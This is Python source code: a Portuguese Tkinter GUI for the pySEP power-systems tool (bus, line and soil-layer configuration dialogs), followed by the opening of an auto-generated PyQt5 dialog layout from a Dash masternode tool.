master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_brita_profundidade.focus_set()
entry_brita_profundidade.grid(row=2, column=2, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Brita RESISTIVIDADE
label_brita_resistividade = tk.Label(
master=frame_config,
text="Resistividade [Ohm.m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_brita_resistividade.grid(row=2, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Brita RESISTIVIDADE
entry_brita_resistividade = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_brita_resistividade.grid(row=2, column=6, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# BOTÃO ADICIONAR BRITA
def __add_butt():
profundidade = float(entry_brita_profundidade.get())
print('\n\nprofundidade = ', profundidade)
resistividade = float(entry_brita_resistividade.get())
print('\n\nresistividade = ', resistividade)
self.__malha.add_info_brita(profundidade=profundidade,
resistividade=resistividade)
self.__malha.show_solo()
set_color_solo(profundidade=profundidade, num_camada=0, resistividade=resistividade, nome="Brita")
butt_add_brita = tk.Button(
master=frame_config,
text="Adicionar informações da camada de Brita!", font=("Helvetica", 12), height=1, # width=10,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_brita.grid(row=2, column=8, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Solo n
label_solo = tk.Label(
master=frame_config,
text="Adicionar nova camada de solo: ",
font=("Helvetica", 20),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_solo.grid(row=3, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Solo PROFUNDIDADE
label_solo_profundidade = tk.Label(
master=frame_config,
text="Profundidade [m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_solo_profundidade.grid(row=4, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Solo PROFUNDIDADE
entry_solo_profundidade = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_solo_profundidade.grid(row=4, column=2, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> LABEL Solo RESISTIVIDADE
label_solo_resistividade = tk.Label(
master=frame_config,
text="Resistividade [Ohm.m]: ",
font=("Helvetica", 12),
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
)
label_solo_resistividade.grid(row=4, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# Informações --> ENTRY Solo RESISTIVIDADE
entry_solo_resistividade = tk.Entry(
font=("Helvetica", 12),
master=frame_config,
justify=tk.CENTER,
bd=2,
bg="light goldenrod",
relief=tk.GROOVE
)
entry_solo_resistividade.grid(row=4, column=6, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# BOTÃO ADICIONAR BRITA
def __add_butt():
self.__malha.set_num_solo()
num_camada = self.__malha.get_num_solo()
profundidade = float(entry_solo_profundidade.get())
print('\n\nprofundidade = ', profundidade)
resistividade = float(entry_solo_resistividade.get())
print('\n\nresistividade = ', resistividade)
self.__malha.add_info_solo(num_camada=num_camada,
profundidade=profundidade,
resistividade=resistividade)
self.__malha.show_solo()
set_color_solo(profundidade=profundidade, num_camada=num_camada, resistividade=resistividade,
nome="H" + str(num_camada))
frame_solos = tk.Frame(
master=frame_config,
bg="light goldenrod",
)
frame_solos.grid(row=5, columnspan=10, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
def set_color_solo(profundidade, resistividade, num_camada, nome):
cores = ["white", "brown", "red", "yellow", "blue", "black", "green"]
frame = tk.LabelFrame(
master=frame_solos,
width=1050,
height=profundidade * 150,
bg=cores[num_camada],
text="\t\tNome: " + str(nome) + "\t\tProfundidade: " + str(
profundidade) + " [m]\t\tResistividade: " + str(resistividade) + " [Ohm.m]",
font=("Helvetica", 12),
)
frame.pack(fill=tk.BOTH, expand=True)
butt_add_solo = tk.Button(
master=frame_config,
text="Adicionar informações da camada de Solo!", font=("Helvetica", 12), height=1, # width=10,
bg="goldenrod",
bd=3,
command=__add_butt,
anchor=tk.CENTER,
justify=tk.CENTER,
compound=tk.CENTER,
padx=2,
pady=2,
relief=tk.GROOVE,
)
butt_add_solo.grid(row=4, column=8, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
def __add_bar(self, event):
    """Callback de evento: abre o diálogo de cadastro de uma nova barra.

    Args:
        event: evento tkinter que disparou o callback (não utilizado).
    """
    self.__config_bar()
    self.__text_status.set("Adicionando uma nova barra! ")
def __s_base(self):
    """Abre um diálogo modal pedindo a potência base do sistema (S_base) em VA.

    O valor digitado é guardado em ``self.__info_basic['sBase']`` e repassado
    ao circuito via ``set_s_base``; a janela é destruída após a confirmação.
    """
    s_base = tk.Toplevel(master=self.__janela)
    s_base.title("\tBem-vindo ao pySEP!!\t")
    s_base.geometry("500x175+500+500")
    s_base.wm_iconbitmap("images/logo_pySEP.ico")
    s_base["bg"] = "light goldenrod"
    # Texto de instrução com o formato esperado (notação científica).
    label_s_base = tk.Label(
        master=s_base,
        anchor=tk.CENTER,
        bg="light goldenrod",
        justify=tk.CENTER,
        padx=2,
        pady=2,
        text="Defina um valor base para o sistema em [VA]!\nInserir conforme exemplo: 100e6",
        font=("Helvetica", 18)
    )
    label_s_base.grid(row=0, columnspan=3, padx=5, pady=5)
    # Campo de entrada do valor; recebe o foco ao abrir o diálogo.
    frame_s_base = tk.Entry(
        font=("Helvetica", 15),
        master=s_base,
        justify=tk.CENTER, width=30,
        bd=2,
        bg="light goldenrod",
        relief=tk.GROOVE
    )
    frame_s_base.focus_set()
    frame_s_base.grid(row=1, columnspan=3, padx=5, pady=5)

    def __s_base_butt():
        # Lê o valor, registra no estado interno e no circuito, e fecha o diálogo.
        # NOTE(review): float() sem validação — entrada não numérica levanta
        # ValueError silenciosamente no callback do tkinter.
        self.__info_basic['sBase'] = float(frame_s_base.get())
        self.__circuito.set_s_base(sBase=float(frame_s_base.get()))
        print('Sbase = ', float(frame_s_base.get()))
        s_base.destroy()

    button_s_base = tk.Button(
        master=s_base,
        text="Vamos lá!", font=("Helvetica", 12), width=10,
        bg="goldenrod",
        bd=3,
        command=__s_base_butt,
        anchor=tk.CENTER,
        justify=tk.CENTER,
        compound=tk.CENTER,
        padx=2,
        pady=2,
    )
    button_s_base.grid(row=2, columnspan=3, padx=5, pady=5)
def __erro(self, mensagem):
    """Exibe uma janela pop-up vermelha de erro com a mensagem informada."""
    janela_erro = tk.Toplevel()
    janela_erro.title("\tERRO!!\t")
    janela_erro.geometry("400x250")
    janela_erro.wm_iconbitmap("images/logo_pySEP.ico")
    janela_erro["bg"] = "red"
    rotulo_erro = tk.Label(
        master=janela_erro,
        text=mensagem,
        font=("Helvetica", 20),
        bg="red",
        anchor=tk.CENTER,
        justify=tk.CENTER,
        padx=2,
        pady=2,
    )
    rotulo_erro.pack(fill='both', expand=True)
def __config_bar(self):
    """Abre o diálogo de cadastro de uma nova barra do sistema.

    Coleta número, tipo (REF/PQ/PV), tensão [pu], ângulo [graus], carga e
    geração [VA]; ao confirmar, registra a barra no circuito, atualiza o
    grafo e fecha o diálogo.
    """

    def __parse_complexo(texto):
        # Converte "P + Q" / "P - Q" em um complexo P ± Qj.
        # Correção de bug: a versão anterior multiplicava a parte imaginária
        # por 1j e SOMAVA mesmo quando o usuário digitava "P - Q".
        if "+" in texto:
            real, imag = map(float, texto.split("+"))
            return real + imag * 1j
        real, imag = map(float, texto.split("-"))
        return real - imag * 1j

    config_bar = tk.Toplevel()
    config_bar.title("Configurações da barra " + str(self.__info_basic['nums'].get('barras')))
    config_bar.geometry("1000x275")
    config_bar.wm_iconbitmap("images/logo_pySEP.ico")
    config_bar["bg"] = "light goldenrod"

    frame_config = tk.Frame(
        master=config_bar,
        bg="light goldenrod"
    )
    frame_config.pack(fill='both', expand=True)

    # TÍTULO DA JANELA
    label_titulo = tk.Label(
        master=frame_config,
        anchor=tk.CENTER,
        bg="light goldenrod",
        justify=tk.CENTER,
        padx=2,
        pady=2,
        text="Configurações da barra " + str(self.__info_basic['nums'].get('barras')),
        font=("Helvetica", 20)
    )
    label_titulo.grid(row=0, columnspan=6, padx=5, pady=5)

    # NÚMERO DA BARRA
    label_num_barra = tk.Label(
        master=frame_config,
        text="Número da barra: ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
    )
    label_num_barra.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W)
    entry_num_barra = tk.Entry(
        font=("Helvetica", 15),
        master=frame_config,
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
        relief=tk.GROOVE
    )
    entry_num_barra.focus_set()
    entry_num_barra.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W)

    ##############################################################################
    label_div_1 = tk.Label(
        master=frame_config,
        text="   |||   ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bg="light goldenrod",
    )
    label_div_1.grid(row=1, column=2, padx=5, pady=5)
    ##############################################################################

    # TIPO DA BARRA.
    # Correção de bug: a versão anterior passava ``command=__tipo_bar.set("1")``
    # etc., o que executava set() imediatamente na construção (deixando
    # command=None) e fazia o último valor, "3", virar o default acidental.
    # O Radiobutton já grava o próprio ``value`` na variável ao ser clicado,
    # então nenhum ``command`` é necessário.
    __tipo_bar = tk.StringVar()
    __tipo_bar.set("1")  # default explícito: barra de referência (REF)
    _tipo1_barra = tk.Radiobutton(
        master=frame_config,
        text="REF",
        variable=__tipo_bar,
        value="1",
        bg="light goldenrod",
    )
    _tipo1_barra.grid(row=1, column=3, sticky=tk.W)
    _tipo2_barra = tk.Radiobutton(
        master=frame_config,
        text="PQ",
        variable=__tipo_bar,
        value="2",
        bg="light goldenrod",
    )
    _tipo2_barra.grid(row=1, column=4, sticky=tk.W)
    _tipo3_barra = tk.Radiobutton(
        master=frame_config,
        text="PV",
        variable=__tipo_bar,
        value="3",
        bg="light goldenrod",
    )
    _tipo3_barra.grid(row=1, column=5, sticky=tk.W)

    ##############################################################################
    label_div_2 = tk.Label(
        master=frame_config,
        text="   |||   ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bg="light goldenrod",
    )
    label_div_2.grid(row=2, column=2, padx=5, pady=5)
    ##############################################################################

    # TENSÃO DA BARRA
    label_tensao_barra = tk.Label(
        master=frame_config,
        text="Tensão da barra [pu]: ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
    )
    label_tensao_barra.grid(row=2, column=0, padx=5, pady=5, sticky=tk.W)
    entry_tensao_barra = tk.Entry(
        font=("Helvetica", 15),
        master=frame_config,
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
        relief=tk.GROOVE
    )
    entry_tensao_barra.grid(row=2, column=1, padx=5, pady=5, sticky=tk.W)

    # ÂNGULO DA BARRA
    label_ang_barra = tk.Label(
        master=frame_config,
        text="Ângulo da tensão \ndesta barra [graus]: ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
    )
    label_ang_barra.grid(row=2, column=3, padx=5, pady=5, sticky=tk.W)
    entry_ang_barra = tk.Entry(
        font=("Helvetica", 15),
        master=frame_config,
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
        relief=tk.GROOVE
    )
    entry_ang_barra.grid(row=2, column=4, padx=5, pady=5, sticky=tk.W)

    # CARGA DA BARRA
    label_carga_barra = tk.Label(
        master=frame_config,
        text="Carga desta barra (P+Qj)\nex.:100e6+50e6 [VA]: ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
    )
    label_carga_barra.grid(row=3, column=0, padx=5, pady=5, sticky=tk.W)
    entry_carga_barra = tk.Entry(
        font=("Helvetica", 15),
        master=frame_config,
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
        relief=tk.GROOVE
    )
    entry_carga_barra.grid(row=3, column=1, padx=5, pady=5, sticky=tk.W)

    ##############################################################################
    label_div_3 = tk.Label(
        master=frame_config,
        text="   |||   ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bg="light goldenrod",
    )
    label_div_3.grid(row=3, column=2, padx=5, pady=5)
    ##############################################################################

    # GERAÇÃO DA BARRA
    label_geracao_barra = tk.Label(
        master=frame_config,
        text="Geração desta barra (P+Qj)\nex.:100e6+50e6 [VA]: ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
    )
    label_geracao_barra.grid(row=3, column=3, padx=5, pady=5, sticky=tk.W)
    entry_geracao_barra = tk.Entry(
        font=("Helvetica", 15),
        master=frame_config,
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
        relief=tk.GROOVE
    )
    entry_geracao_barra.grid(row=3, column=4, padx=5, pady=5, sticky=tk.W)

    # BOTÃO ADICIONAR
    def __add_butt():
        # Lê todos os campos, valida o formato de carga/geração e, se tudo
        # estiver correto, registra a barra e fecha o diálogo.
        num_bar = int(entry_num_barra.get())
        print('\n\nnum bar = ', num_bar)
        tp_bar = int(__tipo_bar.get())
        print('tipo barra = ', tp_bar)
        tensao_bar = float(entry_tensao_barra.get())
        print('tensao bar = ', tensao_bar)
        ang_bar = float(entry_ang_barra.get())
        print('ang bar = ', ang_bar)
        carga_bar = str(entry_carga_barra.get())
        print('carga bar = ', carga_bar)
        geracao_bar = str(entry_geracao_barra.get())
        print('geracao bar = ', geracao_bar)
        if "+" not in carga_bar and "-" not in carga_bar:
            self.__erro(mensagem="INSERIR A CARGA NO FORMATO: \n P + Q OU P - Q !")
        elif "+" not in geracao_bar and "-" not in geracao_bar:
            self.__erro(mensagem="INSERIR A CARGA NO FORMATO: \n P + Q OU P - Q !")
        else:
            carga = __parse_complexo(carga_bar)
            geracao = __parse_complexo(geracao_bar)
            self.__circuito.addBarra(
                barra=num_bar,
                code=tp_bar,
                tensao=tensao_bar,
                ang=ang_bar,
                carga=carga,
                geracao=geracao)
            print("\n\nBarra ", self.__info_basic['nums'].get('barras'), " adicionada! ")
            self.__circuito.showBarras()
            self.__info_basic['nums']['barras'] += 1
            # Conflito de merge resolvido: segue o mesmo fluxo do método
            # irmão __config_lin — atualiza o grafo incrementalmente e
            # remove a logo de fundo.
            self.__grafo_add_node(list_numBar=self.__circuito.getBarras())
            self.__label_logo.destroy()
            config_bar.destroy()

    butt_add = tk.Button(
        master=frame_config,
        text="Adicionar", font=("Helvetica", 12), height=2, width=30,
        bg="goldenrod",
        bd=3,
        command=__add_butt,
        anchor=tk.CENTER,
        justify=tk.CENTER,
        compound=tk.CENTER,
        padx=2,
        pady=2,
        relief=tk.GROOVE,
    )
    butt_add.grid(row=4, columnspan=5, padx=5, pady=5)
def __config_lin(self):
    """Abre o diálogo de cadastro de uma nova linha entre duas barras.

    Coleta as barras de origem/destino e a impedância série [pu];
    ao confirmar, registra a linha no circuito, atualiza o grafo e
    fecha o diálogo.
    """

    def __parse_complexo(texto):
        # Converte "r + x" / "r - x" em um complexo r ± xj.
        # Correção de bug: a versão anterior multiplicava x por 1j e
        # SOMAVA mesmo quando o usuário digitava "r - x", produzindo
        # reatância com sinal errado.
        if "+" in texto:
            real, imag = map(float, texto.split("+"))
            return real + imag * 1j
        real, imag = map(float, texto.split("-"))
        return real - imag * 1j

    config_lin = tk.Toplevel()
    config_lin.title("Configurações de linha ")
    config_lin.geometry("815x275")
    config_lin.wm_iconbitmap("images/logo_pySEP.ico")
    config_lin["bg"] = "light goldenrod"

    frame_config = tk.LabelFrame(
        master=config_lin,
        bg="light goldenrod"
    )
    frame_config.pack(fill='both', expand=True)

    # TÍTULO DA JANELA
    label_titulo = tk.Label(
        master=frame_config,
        anchor=tk.CENTER,
        bg="light goldenrod",
        justify=tk.CENTER,
        padx=2,
        pady=2,
        text="Configurações da " + str(self.__info_basic['nums'].get('linhas')) + " ª linha.",
        font=("Helvetica", 20)
    )
    label_titulo.grid(row=0, columnspan=5, padx=5, pady=5)

    # NÚMERO DA BARRA 1
    label_num_barra1 = tk.Label(
        master=frame_config,
        text="Número da barra \nde origem: ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
    )
    label_num_barra1.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W)
    entry_num_barra1 = tk.Entry(
        font=("Helvetica", 15),
        master=frame_config,
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
        relief=tk.GROOVE
    )
    entry_num_barra1.focus_set()
    entry_num_barra1.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W)

    ##############################################################################
    label_div_1 = tk.Label(
        master=frame_config,
        text="   |||   ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bg="light goldenrod",
    )
    label_div_1.grid(row=1, column=2, padx=5, pady=5)
    ##############################################################################

    # NÚMERO DA BARRA 2
    label_num_barra2 = tk.Label(
        master=frame_config,
        text="Número da barra \nde destino: ",
        font=("Helvetica", 12),
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
    )
    label_num_barra2.grid(row=1, column=3, padx=5, pady=5, sticky=tk.W)
    entry_num_barra2 = tk.Entry(
        font=("Helvetica", 15),
        master=frame_config,
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
        relief=tk.GROOVE
    )
    entry_num_barra2.focus_set()
    entry_num_barra2.grid(row=1, column=4, padx=5, pady=5, sticky=tk.W)

    # IMPEDÂNCIA DA LINHA
    label_imp_linha = tk.Label(
        master=frame_config,
        text="Impedância da linha [pu]: \nExemplo: 0.1 + 0.2 ",
        font=("Helvetica", 14),
        justify=tk.CENTER,
        anchor=tk.CENTER,
        bd=2,
        bg="light goldenrod",
    )
    label_imp_linha.grid(row=2, columnspan=5, padx=5, pady=5)
    entry_imp_linha = tk.Entry(
        font=("Helvetica", 15),
        master=frame_config,
        justify=tk.CENTER,
        bd=2,
        bg="light goldenrod",
        relief=tk.GROOVE,
        width=40,
    )
    entry_imp_linha.grid(row=3, columnspan=5, padx=5, pady=5)

    # BOTÃO ADICIONAR
    def __add_butt():
        # Lê os campos, valida o formato da impedância e registra a linha.
        num_bar1 = int(entry_num_barra1.get())
        print('\n\nnum bar1 = ', num_bar1)
        num_bar2 = int(entry_num_barra2.get())
        print('num bar2 = ', num_bar2)
        z_linha = str(entry_imp_linha.get())
        print('impedância = ', z_linha)
        if "+" not in z_linha and "-" not in z_linha:
            self.__erro(mensagem="INSERIR A IMPEDÂNCIA NO FORMATO: \n r + x OU r - x !")
        else:
            z = __parse_complexo(z_linha)
            self.__circuito.addLinha(
                b1=num_bar1,
                b2=num_bar2,
                z_ij=z)
            print("\n\n", self.__info_basic['nums'].get('linhas'), "ª linha adicionada! ")
            self.__circuito.showLinhas()
            self.__info_basic['nums']['linhas'] += 1
            self.__grafo_add_edge(list_linhas=self.__circuito.getLinhas())
            self.__label_logo.destroy()
            config_lin.destroy()

    butt_add = tk.Button(
        master=frame_config,
        text="Adicionar", font=("Helvetica", 12), height=2, width=30,
        bg="goldenrod",
        bd=3,
        command=__add_butt,
        anchor=tk.CENTER,
        justify=tk.CENTER,
        compound=tk.CENTER,
        padx=2,
        pady=2,
        relief=tk.GROOVE,
    )
    butt_add.grid(row=5, columnspan=5, padx=5, pady=5)
############################## PROTEÇÃO ########################################
# ## DESENHAR CIRCUITO DO SISTEMA :
# def __protecao_draw_ckt(self):
# config_draw_prot = tk.Toplevel()
# config_draw_prot.title("Modelagem do Circuito Considerado")
# config_draw_prot.geometry("1100x700")
# config_draw_prot.wm_iconbitmap("images/logo_pySEP.ico")
# config_draw_prot["bg"] = "light goldenrod"
#
# frame_info_draw_prot = tk.LabelFrame(
# master=config_draw_prot,
# bg="light goldenrod",
# text="Informações Preliminares",
# font=("Helvetica", 20)
# )
# frame_info_draw_prot.pack(fill='both', expand=True)
#
# # LABEL ADD Número de nós do sistema
# label_add_num_nos = tk.Label(
# master=frame_info_draw_prot,
# text="Número de Nós do Sisema: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_num_nos.grid(row=0, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_num_nos = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_draw_prot,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_num_nos.focus_set()
# entry_add_num_nos.grid(row=0, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# # LABEL ADD Imalha
# label_add_imalha = tk.Label(
# master=frame_info_draw_prot,
# text="Corrente de malha [A]: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_imalha.grid(row=0, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_imalha = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_malha,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_imalha.grid(row=0, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
# # LABEL ADD tempo protecao
# label_add_t_protecao = tk.Label(
# master=frame_info_malha,
# text="Tempo da proteção [s]: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_t_protecao.grid(row=1, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_t_protecao = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_malha,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_t_protecao.grid(row=1, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# # LABEL ADD tempo defeito
# label_add_t_defeito = tk.Label(
# master=frame_info_malha,
# text="Tempo do defeito [s]: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_t_defeito.grid(row=1, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_t_defeito = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_malha,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_t_defeito.grid(row=1, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# # LABEL ADD temperatura ambiente
# label_add_temp_ambiente = tk.Label(
# master=frame_info_malha,
# text="Temperatura ambiente [C°]: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_temp_ambiente.grid(row=2, column=0, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_temp_ambiente = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_malha,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_temp_ambiente.grid(row=2, column=1, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# # LABEL ADD temperatura máxima permissível
# label_add_temp_max_permissivel = tk.Label(
# master=frame_info_malha,
# text="Temperatura máxima permissível [C°]: ",
# font=("Helvetica", 15),
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# )
# label_add_temp_max_permissivel.grid(row=2, column=3, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# entry_add_temp_max_permissivel = tk.Entry(
# font=("Helvetica", 15),
# master=frame_info_malha,
# justify=tk.CENTER,
# bd=2,
# bg="light goldenrod",
# relief=tk.GROOVE
# )
# entry_add_temp_max_permissivel.grid(row=2, column=4, padx=5, pady=5, sticky=tk.W + tk.E + tk.N + tk.S)
#
# # BOTÃO ADICIONAR
# def __add_butt_salvar():
# icc = float(entry_add_icc.get())
# print('\n\nIcc = ', icc)
#
# imalha = float(entry_add_imalha.get())
# print('Imalha = ', imalha)
#
# t_prot = float(entry_add_t_protecao.get())
# print('tempo protecao = ', t_prot)
#
# t_def = float(entry_add_t_defeito.get())
# print('tempo defeito = ', t_def)
#
# temp_amb = int(entry_add_temp_ambiente.get())
# print('temperatura ambiente = ', temp_amb)
#
# temp_max = int(entry_add_temp_max_permissivel.get())
# print('temperatura maxima = ', temp_max)
#
# self.__malha.add_icc(i_cc=icc)
# self.__malha.add_i_malha(i_malha=imalha)
# self.__malha.add_t_protecao(t_protecao=t_prot)
# self.__malha.add_t_defeito(t_defeito=t_def)
# self.__malha.add_temp_ambiente(temp_ambiente=temp_amb)
# self.__malha.add_temp_max_permissivel(temp_max_permissivel=temp_max)
#
# config_info_malha.destroy()
#
# butt_add_salvar = tk.Button(
# master=frame_info_malha,
# text="Salvar!", font=("Helvetica", 12), height=2, # width=30,
# bg="goldenrod",
# bd=3,
# command=__add_butt_salvar,
# anchor=tk.CENTER,
# justify=tk.CENTER,
# compound=tk.CENTER,
# padx=2,
# pady=2,
# relief=tk.GROOVE,
# )
# butt_add_salvar.grid(row=3, columnspan=5, padx=5, pady=5)
def __add_lin(self, event):
    """Callback de evento: abre o diálogo de cadastro de uma nova linha.

    Args:
        event: evento tkinter que disparou o callback (não utilizado).
    """
    self.__config_lin()
    self.__text_status.set("Adicionando uma nova linha! ")
@staticmethod
def set_statusbar(janela_main, textvariable):
    """Cria e empacota a barra de status na base da janela principal.

    Args:
        janela_main: janela tkinter que receberá a barra.
        textvariable: ``tk.StringVar`` exibida na barra de status.
    """
    opcoes = dict(
        justify=tk.CENTER,
        bd=4,
        relief=tk.FLAT,
        anchor=tk.W,
        bg="dark goldenrod",
        padx=2,
        pady=2,
        textvariable=textvariable,
    )
    barra_status = tk.Label(janela_main, **opcoes)
    barra_status.pack(side=tk.BOTTOM, fill=tk.X)
@staticmethod
def set_janela(janela_main):
    """Configura título, geometria, ícone e aparência da janela principal."""
    janela_main.title("pySEP - Python em Sistemas Elétricos de Potência!")
    janela_main.geometry("1280x720+100+100")
    janela_main.wm_iconbitmap("images/logo_pySEP.ico")
    for opcao, valor in (("bg", "light goldenrod"), ("bd", 5)):
        janela_main[opcao] = valor
def bemvindo(self, event):
    """Callback de boas-vindas: atualiza o texto da barra de status.

    Args:
        event: evento tkinter que disparou o callback (não utilizado).
    """
    self.__text_status.set("Bem-vindo ao pySEP!")
|
StarcoderdataPython
|
138126
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/Users/blogin/Projects/dash-masternode-tool/src/ui/ui_revoke_mn_dlg.ui.autosave'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_RevokeMnDlg(object):
    """Auto-generated (pyuic5) widget layout for the masternode revoke dialog.

    NOTE: per the file header, this code is generated from a Qt Designer
    ``.ui`` file — edit the ``.ui`` source and regenerate instead of
    modifying this class by hand.
    """

    def setupUi(self, RevokeMnDlg):
        """Build the widget tree, layouts and tab order onto ``RevokeMnDlg``."""
        RevokeMnDlg.setObjectName("RevokeMnDlg")
        RevokeMnDlg.resize(619, 257)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(RevokeMnDlg.sizePolicy().hasHeightForWidth())
        RevokeMnDlg.setSizePolicy(sizePolicy)
        self.verticalLayout = QtWidgets.QVBoxLayout(RevokeMnDlg)
        self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetMinimumSize)
        self.verticalLayout.setContentsMargins(-1, -1, -1, 0)
        self.verticalLayout.setSpacing(12)
        self.verticalLayout.setObjectName("verticalLayout")
        # Description label at the top of the dialog.
        self.lblDescription = QtWidgets.QLabel(RevokeMnDlg)
        self.lblDescription.setWordWrap(True)
        self.lblDescription.setOpenExternalLinks(True)
        self.lblDescription.setObjectName("lblDescription")
        self.verticalLayout.addWidget(self.lblDescription)
        self.stackedWidget = QtWidgets.QStackedWidget(RevokeMnDlg)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.stackedWidget.sizePolicy().hasHeightForWidth())
        self.stackedWidget.setSizePolicy(sizePolicy)
        self.stackedWidget.setObjectName("stackedWidget")
        self.page0 = QtWidgets.QWidget()
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.page0.sizePolicy().hasHeightForWidth())
        self.page0.setSizePolicy(sizePolicy)
        self.page0.setObjectName("page0")
        self.gridLayout = QtWidgets.QGridLayout(self.page0)
        self.gridLayout.setSizeConstraint(QtWidgets.QLayout.SetMinimumSize)
        self.gridLayout.setContentsMargins(0, 0, 0, 0)
        self.gridLayout.setVerticalSpacing(8)
        self.gridLayout.setObjectName("gridLayout")
